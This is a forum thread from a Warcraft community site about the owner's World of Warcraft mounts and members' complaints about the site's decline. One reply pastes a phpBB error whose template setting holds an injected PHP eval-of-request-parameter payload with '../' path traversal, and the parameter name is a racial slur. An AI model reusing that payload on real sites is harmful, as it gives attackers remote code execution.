• 🏆 Texturing Contest #33 is OPEN! Contestants must re-texture a SD unit model found in-game (Warcraft 3 Classic), recreating the unit into a peaceful NPC version. 🔗Click here to enter!
  • It's time for the first HD Modeling Contest of 2024. Join the theme discussion for Hive's HD Modeling Contest #6! Click here to post your idea!

Cannt resist, but theres something i can brag about ;-)

Status
Not open for further replies.
Level 3
dude...were did you u get those mounts?i never saw 'em in darnassus?or is it just that you cant buy 'em in europe? :?

Level 4
Nice Darky honestly as a human paladin(level 59) want a epic horse i dont really like tigers :p ill leave that to my levle 30 night elf priest.Nice job anyway :twisted:

Level 9
gratz on dumbluck and hard work
(tiger is dumbluck, respect for ze other one)

Felcloth looks so dumb on gnomes
If you can raid ZG, get your ass in MC :)
besides, you can't argue with Wolves being the best mounts :p

My Orc

I never found out what server you went to ?

Level 3
Very Nice Darky!Nice looking mounts,you aren't see very often Gnomes on nightelf mounts.A question,how many gold has cost it for you to buy you all,included with "mount riding"?
2200 Gold?Because an epic mount costs 1000 Gold,I mean.But I don't know it!Can you say me please?
Oh, and nice to see you back.(Note:please can you remove some bug with the site template?) I have changed my template on my account with "Darkness the Black Hunter" and now I get a failure everytime I log in.
This is the failure If you want to know:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 421
File : /home/wc3sear.ch/html/includes/functions.php

Level 6
Mecheon said:
I'd be slightly more impressed if you had the raptor instead of the tiger

And slightly more impressed if the damn raptor was the very nice purple skin in the mpq for it...
Heh impossible :p,...More impressive would be if he had the whole Nemesis Set.Flacore is really good for Fire Warlocks,but i don't see that much pvp Warlocks with fire.

Level 9
a warlock with bloodlords defender and a firestone -.-
how ... elegant.

and yes Afro, sadly thats why i don't visit :p

@Infeston:
if you think thats much, then i just spent about 3k gold on mats for Thunderfury :D

Level 7
All this talk makes me glad I quit wow. I, too, bought the 800 gold epic mount (orange raptor, the coolest mount in the game). But the game took over my life. Because you either play it a lot, or don't play it at all. If you play casually, you won't get much (if anything) done. I'm glad you at least took a peek out of your wow "bottomless pit" and remember that you still own this site.

Level 3
Ooohm Saikann,I don't know how to make so many Gold.
I have still 68 Gold liabilities for my mount.
I have once a 50 Tauren Warrior and I am not a very fast player.But I want that this bug is away from my Account :( .

Level 6
You come back after months of wow isolation... to brag about your stupid mounts? You got the most popular wc3 site ever, why dont you brag about that and actually show some interest?

This site started decaying when you left. I almost quit mapmaking when this site started decaying. Your work here affects people more than pictures of your mounts.

WoW kills.

Level 6
I will try not to flame...
TheWickerMan said:
WoW kills.
Yes it does.
EternalFlame said:
Okay, I have a level 46 druid on Kel Thuzad, and I don't really consider myself a n00b. But are those mounts real? I have never heard of them or seen them before - and I have a sneaking suspicioun that you photoshoped that :shock:
Ok, this is PATHETIC! Is the only thing you people talk about anymore WoW? I played it for about six months, yes it was fun then, I gave up because Guild Wars came out without a monthly fee and my brother stopped paying his half at the end of the six months. I was disappoined, but oh well. Then when I dropped it I finally had enough money for what I wanted for other fun games, and also I didn't waste nearly as much time.

THIS WAS THE BEST WARCRAFT 3 SITE IT IS NOT A WORLD OF WARCRAFT SITE!

I really miss when this site was good, whenever I needed help, someone always helped me out within a few hours of when I posted! Also, I went looking at the unanswered posts helping where I could. This was how the site was run, everyone helping eachother. Now the site is full of JUNK that all you noobs put here. This site does not deserve being called the "best Warcraft 3 site," anymore. I am now looking for a better Warcraft site where people help eachother and only the good stuff is allowed and the owner does not go off bragging about WoW and how he is wasting his money and time.

I tried my best not to flame, I did a lot.

Goodbye.

P.S. If you want to contact me, my email and AIM adress are stored on this account, and also my Bnet screen name is Burper53. So far I have only bothered to make my account on the Gateway Azeroth, I will probably make it on some others later on if my map catches on.

Level 6
He's absolutely right. This is a good resource site, but the forum is dead. Glooming when WoW was a game yet to come, now everything's screwed up.
You're all living in your happy WoW character's world, becoming non-socialiced corpses. You shouldn't run a forum. Go back to the whole you've dug.

Cya when WC4 comes (WC4 = Not WoW, just to let you know, Warcraft is forever a strategy game).

Status
Not open for further replies.